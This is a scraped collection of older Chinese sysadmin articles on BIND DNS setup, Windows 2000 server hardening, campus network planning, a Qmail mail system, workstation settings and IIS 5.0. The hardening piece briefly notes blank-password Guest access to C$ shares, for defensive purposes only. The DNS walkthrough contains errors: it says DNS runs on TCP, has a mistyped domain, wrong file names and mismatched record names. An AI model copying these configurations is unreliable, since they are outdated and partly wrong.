(6)教学过程结束，教师可通过NetMeeting工具栏上的“挂断”按钮结束此次教学。

返回


构建DNS服务器简易指南

《一键清理系统垃圾》

构建DNS服务器简易指南

    在用TCP/IP协议族架设的网络中，每一个节点都有一个唯一的IP地址，用来作为它们唯一的标志。然而，如果让使用者来记住这些毫无记忆规律的IP地址将是不可想象的。人们就需要一种有记忆规律的字符串来作为唯一标记节点的名字。
然而，虽然符号名对于人来说是极为方便的，但是在计算机上实现却不是那么方便的。为了解决这个需求，应运而生了一个域名服务系统DNS，它运行在TCP协议之上，负责将字符名——域名转换成实际相对应的IP地址。这个过程就是域名解析，负责域名解析的机器就叫域名服务器。

8.1 域名解析的方法

8.1.1 最早的域名解析方法
最简单的主机名解析方法是，在一个文件中记录所有主机名及与其对应的IP地址，并保证该文件中主机名的唯一性，通过检索文件中的便可以完成主机名的解析。采用这种最简单的解决方法有其历史原因：
在整个70年代，APRANET只是一个小规模的，由类似的数百台主机组成的团体。于是为了解决主机名解析的问题，将连接到ARPANET上每台主机的名字与对应的地址都保存在HOSTS.TXT文件中。这样每增加一台机器，就必须修改HOSTS.TXT文件一次。随着网络的不断发展，网络中的主机数量爆炸性地增加，这种域名解析的方法已经无法适应新的解析需要。

8.1.2 分布式的域名服务器
这种方法，我们已经在基础篇的第六章中有了详细的叙述，在此就不再重复了。在这种分布式的域名服务器体系中，每一台域名服务器（DNS）负责解析属于自己的这一部分主机的域名。
一般说来，如果你所处在公司或组织所拥有的主机并不多，一般是将域名的解析工作交给自己的ISP的域名服务器来完成。而如果你所在组织拥有的主机比较多，我们就可以组建自己的域名服务器负责解析你所在组织的主机。

8.2 域名服务器建立实例

8.2.1 实例环境
假设我们需要建立一台应用于以下情况的一个企业主域名服务器。
1． 拥有一个C类网段地址，为202.101.55.0
2． 企业域名注册为company.com。
3． 域名服务器的IP定为202.101.55.55，主机名为dns.company.com。它同时充当Proxy.
4． 企业网通过路由器与Internet连接。
5． 要解析的服务器有：
www.company.com (202.101.55.1) Web服务器
mail.company.com (202.101.55.2) E-Mail服务器

8.2.2 安装前的准备工作
首先要保证在作为系中统有/etc/resolv.conf和/etc/hosts.conf这两个文件。/etc/resolv.conf文件中内容如下所示：
domain compay.com
nameserver 202.101.55.55
其中第一行指出对于任何希望连到它上面的主机应该搜寻的域。而第二行指出了在哪个地址可以找到需要的域名服务大。/etc/hosts.conf的内容如下所示：
order hosts,bind
multi on
这里的设置告诉主机名称先在/etc/hosts文件中搜索，然后再查询域名服务器。

8.2.3 定义文件/etc/named.boot
要使LINUX系统完成域名服务器的功能，则需要运行一个named的服务进程。这个服务进程可以在安装LINUX时选中。
named启动时需要读取一个初始化文件——/etc/named.boot，这个文件是named的基本配置文件。它并不包含任何DNS数据，针对前面的假定环境，我们要在这个文件中写入：
diretory /etc/named
primary company.com db.company
primary 0.0.127.IN-ADDR.ARPA db.127.0.0
primary 55.101.202.IN-ADDR.ARPA db.202.101.55
cache . db.cache
下面我们逐行讲解这个文件中的内容：
1) 在第一行中我们指定named从/etc/named目录下读取DNS数据文件。这个目录可以自行指定并创建，指定后将所有的DNS数据文件均存放在这个目录下；
2) 第二行指定named作为company.com的主域名服务器，db.company文件中包含了所有*.my.com形式的域名的解析数据。
3) 第三行则指定named作为127.0.0网段（本地loopback）地址的转换主服务器。其中db.127.0.0文件中包含了所有127.0.0.*形式的地址到域名的转换数据。
4) 第四行指定named作为202.101.55网段地址转换主服务器，db.202.101.55文件中包含了所有以202.101.55.*形式的地址到域名的转换数据。
5) 最后一行指定named从db.cache文件中获得Internet的顶层“根”服务器地址。
要说明的是，这些数据文件的名称均是自行决定的。

8.2.3 建立正向域名转换数据文件db.company
根据/etc/named.boot文件中的定义，我们在/etc/named目录下建立文件db.company，并且在其中写入所有在company.com域内的主机节点。根据前面假定的环境，可以写入：

@ IN SOA dns.company.com. root.dns.company.com.(
200002011 ；文件版本号
28800 ；刷新时间（秒）
7200 ；重试时间（秒）
3600000 ；终止时间（秒）
86400） ；TTL生存时间（秒）
IN NS dns.company.com
www IN A 202.101.55.1
email IN A 202.101.55.2
proxy IN CNAME dns

下面我们就逐句地理解这里的配置。
1． SOA是主服务器设定文件中一定要设定的命令，我们通常将它放在文件的第一行。
1） 最前面的符号“@”代表目前所管辖的域。
2） 接着的“IN”代表地址类别，这里就是固定使用“IN”的。
3） 接下来就是命令SOA。
4） 接下来填入域名服务器，记住由于DNS数据文件的特殊格式规定，在最后一定要加上“·”，在这个例子中，我们填入域名服务器：“dns.company.com.”
5） 接下来是域名服务器管理员的E-MAIL地址，但要注意的是，E-Mail地址中的分隔符“@”在这里用“·”来代替，在最后也要加上“。”，在这里，我们相应写入：“root.dns.company.com.”
6） 接下来在括号内填上各种选项：
文件版本号：当你修改这个文件的内容时，也要修改这个版本序列号。以此来区分是否有更新。
更新时间：指定二级服务器向主服务器拷贝数据的更新时间周期。
重试时间：指定二级服务器在更新出现通信故障时的重试时间。
终止时间：指定二级服务器重新执行更新动作后仍然无法完成更新任务而终止更新的时间。
生存时间：指定当域名服务器询问某个域名和其IP地址后，在域名服务器上放置的时间。
注：二级服务器所设定的域名服务器是主服务器的备份主机。
2． 在第二行中，我们用NS命令指定这个域的域名服务器。在这里我们指出这个域的域名服务器是“dns.company.com”。
3． 接下来的两行我们使用A命令来指定域名与IP地址的对应关系。我们将Web服务器的域名www.company.com与其IP地址202.101.55.1对应起来；将E-Mail服务器的域名mail.company.com与其IP地址202.101.55.2对应起来。
4． 最后一行，我们使用了CNAME命令为dns.company.com指定了另一个域名以供使用：proxy.company.com。

8.2.3 建立反向域名转换数据文件db.127.0.0和db.202.101.55
反向域名转换数据文件用来提供IP地址查询相应的DNS主机名，每个网段分别有一个数据文件。
1． 网段127.0.0通常只有一个地址，那就是127.0.0.1 loopback地址。所以我们在db.127.0.0中写入的内容是：

@ IN SOA dns.company.com. root.dns.company.com.(
200002011 ；文件版本号
28800 ；刷新时间（秒）
7200 ；重试时间（秒）
3600000 ；终止时间（秒）
86400） ；TTL生存时间（秒）
IN NS dns.company.com
1 IN PTR localhost

前面两名相信读者已经不会陌生，最后一句我们使用PTR命令让配置文件中的主机可以使用IP地址来知道所对应的域名。
最前面的1代表127.0.0.1，对应的域名就是localhost。
2．网段202.101.55就可能会存在更多的记录，前面假定环境下的设置应是：

@ IN SOA dns.company.com. root.dns.company.com.(
200002011 ；文件版本号
28800 ；刷新时间（秒）
7200 ；重试时间（秒）
3600000 ；终止时间（秒）
86400） ；TTL生存时间（秒）
IN NS dns.company.com
1 IN PTR www
2 IN PTR email
55 IN PTR dns
55 IN PTR proxy

8.2.4 获得db.cache文件
在LINUX系统中通常在提供了一个named.ca的文件，该文件中Internet的顶层域名服务器，但是这个文件通常会发生变化，所以建议最好从Internet上下载最新的版本。该文件可以通过匿名FTP从ftp.rs.internic.net/domain下载，文件名是named.boot。将它拷贝一份为db.cache就可以了。

8.3 测试域名服务器

8.3.1 使用nslookup测试
nslookup命令的功能是查询域名服务器中的数据资料。下例就是使用它来测试域名服务器是否架设成功，其中斜体字代表要输入的内容。

# nslookup
Default server:dns.company.com
Address:202.101.55.55 ；能出现这些信息代表成功
> www
server:dns.company.com
Address:202.101.55.1

8.3.2 使用ping测试
还有一种更简单的测试方法，那就是用ping命令，如果成功将显示：

# ping www.company.com

Ping www.company.com(202.101.55.1);56 data bytes
64 bytes from 202.101.55.1:icmp_seq=0 ttl=255 time=1.3ms
64 bytes from 202.101.55.1:icmp_seq=1 ttl=255 time=0.6ms
64 bytes from 202.101.55.1:icmp_seq=2 ttl=255 time=0.6ms
……

8.4 小技巧
安装好域名服务器后，在内部使用域名进行远程连接时，会发现速度非常慢。其实只要/etc/hosts中加上所有内部的机器的域名就可以了。

返回


构建Win2000服务器的安全防护林

《一键清理系统垃圾》

构建Win2000服务器的安全防护林

中小学校的校园网普遍应用Windows 2000作为服务器的操作系统，但有些学校刚开始运行就遭到网络黑客的攻击，造成网络崩溃。那么，安全问题怎么解决？其实不需要任何的软硬件的介入，仅靠系统本身我们就能构建一个安全防护林。

    设置禁用，构建第一道防线

    在安装完Windows 2000后，首先要装上最新的系统补丁。但即使装上了，在因特网上的任何一台机器上只要输入“\你的IP地址c$”，然后输入用户名Guest，密码空，就能进入你的C盘，你还是完全暴露了。解决的方法是禁用Guest账号，为Administrator设置一个安全的密码，将各驱动器的共享设为不共享。同时你还要关闭不需要的服务。你可以在管理工具的服务中将它们设置为禁用，但要提醒的是一定要慎重，有的服务是不能禁用的。一般可以禁用的服务有Telnet、Task Scheduler（允许程序在指定时间运行）、Remote Registry Service（允许远程注册表操作）等。这是你构建的服务器的第一道防线。

    设置IIS，构建第二道防线

    作为校园网的服务器，很多学校将该服务器同时作为网站服务器，而IIS的漏洞也是一个棘手的问题。实际上，你可以通过简单的设置，完全可以将网站的漏洞补上。你可以将IIS默认的服务都停止（如图1，FTP服务你是不需要的，要的话笔者推荐用Serv-U；“管理Web站点”和“默认Web站点”都会给你带来麻烦；SMTP一般也不用），然后再新建一个Web站点。

图1
    设置好常规内容后，在“属性→主目录”的配置中对应用程序映射进行设置，删除不需要的映射（如图2），这些映射是IIS受到攻击的直接原因。如果你需要CGI和PHP的话，可参阅一些资料进行设置。

图2
    这样，配合常规设置，你的IIS就可以安全运行了，你的服务器就有了第二道防线。

    运用扫描程序，堵住安全漏洞

    要做到全面解决安全问题，你需要扫描程序的帮助。笔者推荐使用X-Scan（如图3），它可以帮助你检测服务器的安全问题。

图3
    扫描完成后，你要看一下，是否存在口令漏洞，若有，则马上要修改口令设置；再看一下是否存在IIS漏洞，若有，请检查IIS的设置。其他漏洞一般很少存在，我要提醒大家的是注意开放的端口，你可以将扫描到的端口记录下来，以方便进行下一步设置。

    封锁端口，全面构建防线

    黑客大多通过端口进行入侵，所以你的服务器只能开放你需要的端口，那么你需要哪些端口呢？以下是常用端口，你可根据需要取舍：80为Web网站服务；21为FTP服务；25 为E-mail SMTP服务；110为Email POP3服务。

    其他还有SQL Server的端口1433等，你可到网上查找相关资料。那些不用的端口一定要关闭！关闭这些端口，我们可以通过Windows 2000的安全策略进行。

    借助它的安全策略，完全可以阻止入侵者的攻击。你可以通过“管理工具→本地安全策略”进入，右击“IP安全策略”，选择“创建IP安全策略”，点[下一步]。输入安全策略的名称，点[下一步]，一直到完成，你就创建了一个安全策略（如图4）：

图4
    接着你要做的是右击“IP安全策略”，进入管理IP筛选器和筛选器操作，在管理IP筛选器列表中，你可以添加要封锁的端口，这里以关闭ICMP和139端口为例说明。

    关闭了ICMP，黑客软件如果没有强制扫描功能就不能扫描到你的机器，也Ping不到你的机器。关闭ICMP的具体操作如下：点[添加]，然后在名称中输入“关闭ICMP”，点右边的[添加]，再点[下一步]。在源地址中选“任何IP地址”，点[下一步]。在目标地址中选择“我的IP地址”，点[下一步]。在协议中选择“ICMP”，点[下一步]。回到关闭ICMP属性窗口，即关闭了ICMP。

    下面我们再设置关闭139，同样在管理IP筛选器列表中点“添加”，名称设置为“关闭139”，点右边的“添加”，点[下一步]。在源地址中选择“任何IP地址”，点[下一步]。在目标地址中选择“我的IP地址”，点[下一步]。在协议中选择“TCP”，点[下一步]。在设置IP协议端口中选择从任意端口到此端口，在此端口中输入139，点下一步。即完成关闭139端口，其他的端口也同样设置，结果如图5。

    特别指出的是关闭UDP4000可以禁止校园网中的机器使用QQ。

图5
    然后进入设置管理筛选器操作，点“添加”，点下一步，在名称中输入“拒绝”，点下一步。选择“阻止”，点[下一步]。结果如图6。

图6
    然后关闭该属性页，右击新建的IP安全策略“安全”，打开属性页。在规则中选择“添加”，点[下一步]。选择“此规则不指定隧道”，点下一步。在选择网络类型中选择“所有网络连接”，点下一步。在IP筛选器列表中选择“关闭ICMP”，点[下一步]。在筛选器操作中选择“拒绝”，点下一步。这样你就将“关闭ICMP”的筛选器加入到名为“安全”的IP安全策略中。同样的方法，你可以将“关闭139”等其他筛选器加入进来。添加后的结果如图7。

    最后要做的是指派该策略，只有指派后，它才起作用。方法是右击“安全”，在菜单中选择“所有任务”，选择“指派”。IP安全设置到此结束，你可根据自己的情况，设置相应的策略。

图7
    设置完成后，你可再用X-Scan进行检查，发现问题再补上。

    通过以上的设置，你的Windows 2000服务器可以说是非常安全了。希望你早日筑起服务器的安全防护林。


构建经济实用的校园网

《一键清理系统垃圾》

构建经济实用的校园网

    为教育领域提供一个良好的信息化教育环境是开展教育信息化工作和普及信息技术教育的有力保障，中小学校园网显然是这一教育环境的硬件保障，它已成为学校建设的重中之重。随着中国教育科研网（CerNet）的建设，大学校园网的建设已经有了很大的发展，而中小学校园网的建设还处于起步阶段。在建设过程中，我们可以借鉴大学校园网的很多经验，但中小学计算机校园网的应用环境、教师对计算机网络的使用水平、教育对象、学校管理结构和教育经费等情况都与大学有较大不同。因此，如何规划建设一个经济实用的校园网，成了众多教育工作者共同思考的问题。下面就如何构建经济实用的校园网问题谈一些经验。

    校园网基本功能

    中小学校园网实质上是一种局域网，它内部通过电缆或光缆连接服务器、工作站及各种通信设备，对外也可通过DDN专线或其他通信线路（如ISDN）连通Internet。
    学校可以通过校园网查询统计包括学生学籍情况及学习成绩、教师人事档案及业务资料、学校财务数据报表等在内的各类资料；通过学校主页向校外进行各类信息发布；通过电子邮件系统收发教育行政部门的文件、通知等。
    教师可以通过电子备课系统、计算机辅助教学系统等开展高质量、高效率的教学工作；可通过国际互联网查询资料，随时了解教科研的最新动态。学生可以通过校园网学习、巩固知识，还可根据自己的兴趣、爱好，在网上进行科学探索，撰写科学论文。所以，校园网为学校教育提供了一个良好的网络环境，为培养学生创新能力、发挥学生个性特长提供了网络空间。

    硬件构建方案

    1、主干网络技术的选择。
    选用100M交换式快速以太网。目前100Base－TX快速以太网是10Base－T标准的发展，100Base－TX已经被IEEE 802.3以太网标准委员会标准化，它保留了CSMA/CD协议，使得局域网上的10Base－T和100Base－TX站点之间在数据通信时不需要协议转换，可与10Base－T网络进行无缝连接，并且可以非常容易地实现100Base－TX向1000Base－T的迁移。交换式快速以太网技术是快速以太网技术和交换式技术的结合，交换机每个连接端口能够独享100Mbps的带宽。
    2、网络集成环境的组建。
    (1)校园网络控制中心。它是整个校园网的心脏，应配置系统服务器、文件服务器、一级交换机、配线机柜等,服务器可选用HP、IBM等品牌服务器，交换机可选用3COM、CISCO等产品，服务器网卡可选用3COM的3905B－TX 100M网卡。为了进行统一的划分和管理，将设备间、服务器等都设置在同一个办公室内，设备间要安装在不容易碰到的地方，同时又要方便管理人员的管理。
    (2)教师办公中心。教师是校园网的受益者之一，他们可通过校园网查询资料、交流教学内容和方法，实现资源共享。每个办公室可配置二台586机器，有条件的可以人手一台，每台机器都与校园网联网。
    (3)多媒体网络教室。采用1台EH3008A－SW 10/100M交换机和3台EH2016A 10M集线器，30台左右学生用机，1台教师用机和适当的多媒体外部设备。整个多媒体网络教室通过视频传输线总线连接，全部采用纯硬件连接，不依赖网络，大大减少对多媒体网络教室的维护工作量。同时每台计算机都安装10M网卡，使其都能访问网络控制中心文件服务器的内容。
    (4)学生机房。配置30台左右586以上微机，通过星型网络拓扑结构将所有微机连接到可堆叠集线器HUB上，再通过HUB连接校园主干网。为便于教学，可在学生机房安装多媒体教学平台，使之成为一个既能完成信息技术学科的教学，又能进行多媒体辅助教学，还能开展基于Internet的网络活动的多媒体网络活动室。
    (5)校长办公室及其他处室。配置相应数量的586机器，通过网卡与校园主干网相连，以实现学校信息管理的自动化。

    软件环境

    1、服务器操作系统采用Windows NT4.0以上版本。代理服务软件可采用WinGate For NT(如果选用Win 2000则不需要单独的代理服务器软件)。Web服务系统选用Windows NT下的IIS信息服务系统。
    2、教师机工作站选用Win95/98操作系统，并安装Authorware、Dirctor、VB等多媒体课件制作软件、办公软件(Office)和一些工具软件如：Flash、3D MAX、Photoshop等。
    3、校长和管理人员计算机，除安装办公软件外，还可安装一些管理软件。
    4、网络机房学生机选用Win95/98作为操作系统，并安装适当的应用软件。

    网络管理维护

    针对中小学计算机教师的师资力量，网络管理不能特别复杂，为了对校园网进行统一、简单和有效的管理，下面从三个方面进行阐述：
    1、教师用机和学生用机都应安装保护卡，使计算机的系统分区得到保护，避免全校师生在学习、使用过程中，由于误操作而使系统损坏，从而影响校园网的运行。
    2、对每一个用户都给予相应权限的账号，使全校师生既能充分利用校园网的资源，又能方便网络管理人员对校园网络的管理。
    3、对于需要共享的资源统一设定权限，以方便广大师生查询使用。

返回


构建企业级电子邮件系统

《一键清理系统垃圾》

构建企业级电子邮件系统

        实践证明，基于 Windows NT 的 Exchange Server 并不是企业级电子邮件系统的最佳选择。由于对稳定性等性能要求非常高，因此大型电子邮件系统一般都使用UNIX作为服务器的操作系统，例如，Hotmail使用FreeBSD和Solaris，国内163等站点也是采用BSD系列。追求稳定的大型企业可采用FreeBSD和Solaris，普通中小企业可采用Linux。
    传统的UNIX系统下的电子邮件系统由于设计所能承受的用户数有限，其系统结构存在一定的缺陷，难以承受大用户量的访问。比如，应用非常广泛的Sendmail系统就存在如下几个局限性：
    * 由于其用户信息存放于/etc/passwd文件中，在大用户量的情况下认证效率将会大大降低；
    * 邮件存放通常在/var/mail目录下面，每个人的邮件是一个文件，用户数多则邮件文件就多。而在UNIX系统中，同一级目录中的文件超过一定数量后，文件系统运转效率将会大大降低。当使用NFS共享存储空间的时候，还会产生一个严重的问题——由于NFS缺乏文件锁定机制，在使用传统的用户邮件存储格式Mailbox时，由于所有的邮件都保存在同一个文件中，因此进行邮件操作就必须加锁，以保证没有访问冲突，这就使得它不适合NFS存储方式；
    * 由于每一个用户的多封邮件都位于同一个文件中，所以如果在用户取信过程中出现网络异常，则很容易引起邮箱的死锁。
    上述问题大大限制了Sendmail邮件系统在用户数量较大情况下的应用。另外，如果完全以系统用户做为邮件系统的用户也存在严重的安全隐患。因此，如果要适应大容量的需要，必须从邮件系统体系结构上，特别是邮件存贮方式和用户认证方式上进行改进，使之在大用户量的情况下仍旧能够保持良好的性能。
    Qmail是可以完全替代Sendmail-binmail体系的新一代UNIX邮件系统，它也是一个基于UNIX操作系统的Internet邮件传输机构（ Internet Mail Transfer Agent 简称MTA)。它采用标准的简单邮件传输协议（Simple Mail Transfer Protocol 简称SMTP)与Internet上其他MTA交换信息。为了解决用户邮件存储问题，Qmail提出了Maildir存储方式，每个邮件作为单独的一个文件保存在用户个人的邮件目录下，这就避免了加锁。同时，Qmail支持虚拟域（Virtual Domain）和虚拟用户（Virtual User），使邮件系统的用户独立于UNIX系统用户。与Sendmail相比，Qmail有以下优点：
    *安全---- Qmail将E-mail处理过程分为多个分过程，尽量避免以Root用户身份运行。同时Qmail也禁止对特权用户(Root、Deamon等)直接发信。
    *可靠---- Qmail的直接投递保证了E-mail在投递过程中不会丢失。Qmail同时支持新的更可靠的信箱格式——Maildir，保证系统在突然崩溃情况下不至破坏整个信箱。
    *高效----运行在奔腾的BSD上,Qmail每天可以轻松地投递20万封电子邮件。
    *简单---- Qmail 要比其他的Internet Mail系统小得多。 它通过统一的向前机制完成Forwarding、Alias和Maillist等功能, Qmail使用简单高效队列来处理投递。Qmail-SMTPD可以由Inetd启动,节省了一定资源。
    当前在国内最流行的免费电子邮件系统如163、371等，都是使用网易公司开发的系统。这些系统就是采用Qmail作为基本服务器软件，采用NFS网络文件系统作为用户邮件存储空间，使用Maildir作为邮件存储格式，提供多级目录以支持较大的用户数。
    与Internet上的免费电子邮件系统相比，大中型企业电子邮件系统用户主要为企业内部用户，虽然数量没有上十万、百万那么多，用户群也相对固定，但对系统的安全性、稳定性的要求更高，用户管理工作也更细致、繁琐。如果能采用统一的Web 形式建立完善的用户数据库并提供邮件服务和用户管理，则会在方便用户的同时，大大地减轻系统管理员繁琐的工作。
    Qmail是GNU下的一个著名的自由软件，世界各地的高手们为进一步完善和扩充它的功能，开发了大量的基于Qmail的工具和补丁软件，VmailMgr(Virtual Mail ManaGeR)就是其中之一。它增强了Qmail虚拟域（Virtual Domain）的功能，提供了大量的命令，以方便建立和管理独立于UNIX系统用户的邮件系统用户，提供软、硬空间限额等丰富的管理功能；邮件服务器的虚拟用户也可以通过POP3、IMAP标准协议访问自己的邮箱。特别值得一提的是，VmailMgr还提供一组CGI程序和PHP函数，有了这组程序，用户们可以通过Web页面进行邮箱申请、密码更换，邮件管理员也可以通过Web页面轻松完成用户管理和邮件系统的配置工作。

    一个优秀的大型企业电子邮件系统应该具备以下功能：
    1. 为企业内部用户提供大规模高速安全可靠的邮件服务，用户数量可达数千至数万人。
    2. 邮件系统支持各种E-mail的标准协议，提供POP3和IMAP邮件访问方式。
    3. 提供WebMail的功能，用户只需要一个浏览器，便能完成所有邮件的操作。
    4.为每个用户提供20MB或更大的大容量邮件存储空间。
    5.为用户提供Mailing List、邮件转寄、别名等功能。
    6. 建立用户数据库系统，保存用户注册时的个人信息，方便用户管理。
    7. 为日常维护人员提供完全基于浏览器的日常管理和监测工具，支持远程管理。
    该系统对硬件要求不高，可采用性能价格比较高的PC型服务器。具体配置根据用户数量而定，如果用户数量较少，单台普通的PC服务器配以稍大一些的SISC硬盘就能满足要求；如果用户数量较大，则需要较大内存（最好配到256MB以上），相应外存要求也较高，可配100GB以上的RAID系统或采用专用的NFS服务器，以适应大量用户大容量邮件存储的要求。
    软件可以全部使用开放源代码的自由软件，功能全面，可根据需要灵活配置。为追求稳定，在大型企业应用中可采用Freebsd替换Linux，具体配置见表1。

表1 序号
类别
名称
版本
下载地址

1
操作系统
linux
blue point 1.0
http://www.openunix.net/

2
邮件系统
qmail
1.03
http://www.qmail.org/

3

vmailmgr
0.96
http://www.vmailmgr.org/

4

courier imap
0.32
www.inter7.com/courierimap/

5
web服务器
apache
1.3.12
http://www.apache.org/

6

php 3
3.0.12
http://www.php.org/

7
数据库系统
mysql
3.22.3.0
http://www.mysql.org/

    这样的一套系统具有很高的性能价格比，突破了以往邮件系统依赖于昂贵硬件设备的限制，从高端服务器到低端服务器均可以适应，易于管理和使用，提供高性能的大容量邮件服务。尤其是软件全部使用开放源代码的自由软件，使我们能够自由下载和传播这些软件的源代码。与一般商业软件相比，这些自由软件在可靠性、安全性及稳定性上有明显优势。它们大多数具备良好的定制功能，使用者能够完全按照自己的需求来定制软件。除了能节约购买商业软件的巨大开销外，开放源代码使得软件在版权方面比私有软件具有更大的灵活性，也给我们安装软件以更大的自由度。目前有几百种成熟的开放源代码产品正被广泛使用，有一些产品的性能大大超过了同类的商业软件。

返回


关于MMU产品的系统/网络管理基本设置

《一键清理系统垃圾》

关于MMU产品的系统/网络管理基本设置

1．　在安装MMU之前，要对系统新添加N个用户，具体添加的用户量由具体MMU工作站数量而定。具体的添加方式如下：

在Windows 2000的“控制面板”中双击“用户和密码”图标，确认在“用户”选项卡中选中“要使用本机，用户必须输入用户名和密码”复选框(如图1所示)，否则将无法使用“添加”按钮。然后单击“添加”按钮，即可打开“添加新用户”对话框(如图2所示)，在 “用户名”项目中输入新建用户的名称。在输入用户名之后，可以在“全名”和“说明”文本框中加入关于此用户的详细说明，以便于今后的管理和区分。所有内容都填写完毕之后，单击“下一步”进入密码输入窗口，在这里需要输入2次同样的密码，如果输入的密码不匹配，会出现要求重新输入的消息框。密码输入准确之后就可以单击“下一步”进入权限配置窗口，在权限配置窗口下，Windows 2000为系统管理员提供了3个权限设置选项，管理员既可以将新建的用户设为“标准用户”也可以将其设为“受限用户”，还可以选择“其他”，然后利用权限下拉列表为新建的用户分配一种权限。在分配权限之前，管理员可以利用窗口上简短的文字说明对当前的权限范围做一个简单的了解。由于权限的分配会直接影响到系统的安全性，因此在做出选择前必须仔细考虑。权限设置之后就可以单击“完成”按钮，完成新用户的添加。这时，回到“用户和密码”对话框中就可以在“本机用户”列表下看到刚才添加的用户了。

(图一)

（图二）

当新用户被注册后，我们将对其进行一些管理设置，主要是对用户密码与用户组的设置，具体方式如下：

在添加用户之后，如果要对用户的权限做进一步修改和定制，就需要使用Windows 2000的用户管理工具。在“控制面板”中双击“用户和密码”图标，选择“高级”选项卡，单击“高级用户管理”项目栏中的“高级”按钮，打开“本地用户和组”管理工具(如图3所示)。在窗口左侧的目录树中选中用户，然后在右侧的用户目录中双击要修改的用户名，打开属性设置对话框(如图4所示)。在“常规”选项卡中列出了多个关于密码设置的选项，可以允许用户对密码的使用做进一步设置。由于管理员为新建用户分配的密码通常比较简单，不一定能够符合用户的使用习惯，因此通常需要选择“用户下次登录时需更改密码”复选框，使用户可以选择自己容易记忆的密码。而从安全性考虑，通常不建议选择“密码永不过期”复选框。如果希望某个用户同时属于不同组，可以在属性设置对话框中选择“隶属于”选项卡，然后单击“添加”按钮，打开“选择组”窗口，在窗口的用户组列表中选中待分配的组，然后单击“添加”就可以为用户赋予相应的组了。

（图三）

（图四）

我在图四的对话框中的常规选项中选择“密码永不过期”，在“隶属于”的选项中，我们一般将新注册的用户隶属于”Power User”或”User”组。

2．　在安装使用MMU产品之前要对其电源管理进行相关的设置，具体设置如下：

在“控制面板“中，双击“电源管理”选项，在“电源使用方案”的选项中选择“始终打开”;在“为始终打开，设置电源使用方案”的选项中的“系统等待”，“关闭硬盘”，“关闭监视器”三个选项都选择“从不”即可。

3．　对性能的虚拟内存进行优化设置，具体方式如下：

进入“控制面板”中，然后双击“系统”选项，在出现的对话框中单击“性能选项”（图一）。

在图一的对话框中单击“更改”选项后，如（图二）所示：

（图二）

在图二中我们可以看到“驱动器 [卷标]”C：已经被设置了“页面文件大小（MB）”，但驱动器D并没有被设置，我们可以单击这个对话框中的“设置”来进行设置，那么“初始大小（MB）”与“最大值（MB）”可以设置成与“驱动器C”一样，当设置成功后，“所有驱动器页面文件大小总数”将会发生变化，最后单击“确定”完成设置。

Windows 2000对于内存的管理同Windows 9x略有不同——它或者可以对应用程序的性能进行优化，或者对后台服务进行优化。如果你的Windows2000只是作为一个个人操作系统来使用，那么使用Windows2000默认的选择就可以了——windows2000默认就是针对应用程序进行优化的。

4． 通过设置来防止系统因系统本身或应用程序错误而导致机器自动重启，具体设置如下：

右击我的电脑，选择属性\高级\启动和故障恢复，即可进入如下界面（图一）：

（图一）

在“系统失败”的标题下，将“自动重新启动”这个选项前的对钩去掉，这样当系统遇到自身或其他错误而失败时不会自动重启。

5． 关于网络部分，只需设定好主机，其他各个工作站则无需设置，但每个工作站则都将保持独立。

6． 通过设置MMU用户的访问权限来达到系统安全的效果，具体设置如下：

双击我的电脑，右键单击“驱动器c”，将会出现如下对话框

在这个对话框中选择“安全选项”

7． 针对系统安全设置应用软件的安全策略应该是：

将各种应用软件安装到非c盘的驱动器中即可。

8． 各个工作站（MMU）的显卡（PCI）的设置如下：

9． 对主机的注销设定将不会影响到其他工作站（MMU）的使用和工作

10．　　　　　　　如何查看各个工作站的PCI显卡信息：

在桌面上单击鼠标右键，选择属性，在出现的视窗中选择“高级”选项，在选择“适配器”选项后，如下图所示：

11．　　　　　　　通过设置来关闭跟随系统启动而自动启动的程序，从而提高系统的启动速度，具体设置如下：

可以通过删除注册表的
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNRUN项中
的程序键值来使某个程序无法随系统启动而启动。不过在删除前建议你最好将这个
键值导出备份，因为有可能在你删除后，会出现程序无法运行的情况。

12．　　　　　　　设置自动关闭停止响应的程序，从而提高各个工作站的使用速度，具体设置如下：

对于停止响应的程序，可以通过修改注册表使得系统不再通知你，而是自动关闭——不再需要用户的干预，从而提高工作效率。具体方法是，打开注册表编辑器，找到如下键值：
HKEY_CURRENT_USER\Control Panel\Desktop，把AutoEndTasks修改为1。以后如果遇到停止响应的程序，系统就会自动中止它。

返回


管理Internet 信息服务器

《一键清理系统垃圾》

管理Internet 信息服务器

本章内容包括：
1、IIS5.0 的新特性
2、WEB站点和 FTP 站点的配置与管理
3、设置 WEB 和 FTP 属性
4、SMTP 的配置
5、NNTP 的配置

    14.1 IIS5.0 的新特性
    在 Windows 2000 中微软更新了 IIS 的版本，推出了 Internet Information Server 5.0 , 与 IIS4.0 相比 IIS5.0 提供了方便的安装和管理，增强的应用环境，基于标准的发布协议，在性能和扩展性方面有了很大的改进，为客户提供更佳的稳定性和可靠性。

14.1.1 安全性
§　摘要式身份验证：摘要式身份验证允许跨代理服务器和防火墙对用户进行安全和严格的身份验证。另外，还可进行匿名、HTTP 基本以及集成 Windows 身份验证（以前称为 Windows NT 质询/响应身份验证和 NTLM 身份验证）。
§　安全通讯：安全套接字协议层 (SSL) 3.0 和传输协议层安全 (TLS) 提供了一种客户端与服务器之间进行信息交换的安全方式。另外，SSL 3.0 和 TLS 还为服务器提供了一种在用户登录服务器之前对客户端进行验证的方法。在 IIS 5.0中，ISAPI 和 Active Server Pages 都可以访问客户证书，以便编程人员通过其站点跟踪用户。同时，IIS 5.0 还可以将客户证书映射为 Windows 用户帐户，以便管理员可以根据客户证书控制对系统资源的访问。
§　服务器网关加密：服务器网关加密 (SGC) 是 SSL 的扩展，允许使用 IIS 出口版的金融系统采取加密性能更高的 128 位加密。虽然 IIS 5.0 中已内置了 SGC 功能，但使用 SGC 时仍然需要特殊的 SGC 证书。

§　安全向导：安全向导简化了服务器管理任务。
  §　"Web 服务器证书向导"简化了证书管理任务，如创建证书请求以及管理证书生存期。
  §　"权限向导"通过向虚拟目录和文件分配访问策略的方式，从而简化了配置 Web 站点访问的任务。"权限向导"还可以更新 NTFS 文件权限来反映 Web 访问策略。
  §　CTL 向导可帮助用户配置证书信任列表 (CTL)。CTL 是特定目录的可信证书颁发机构列表 (CA)。CTL 对于那些在服务器上有几个 Web 站点、并且要求每个站点拥有不同可信证书颁发机构列表的 Internet 服务提供商 (ISP) 尤其有用。
§　IP 地址及 Internet 域限制：可以授予或拒绝单台计算机、计算机组或者整个域对 Web 的访问。
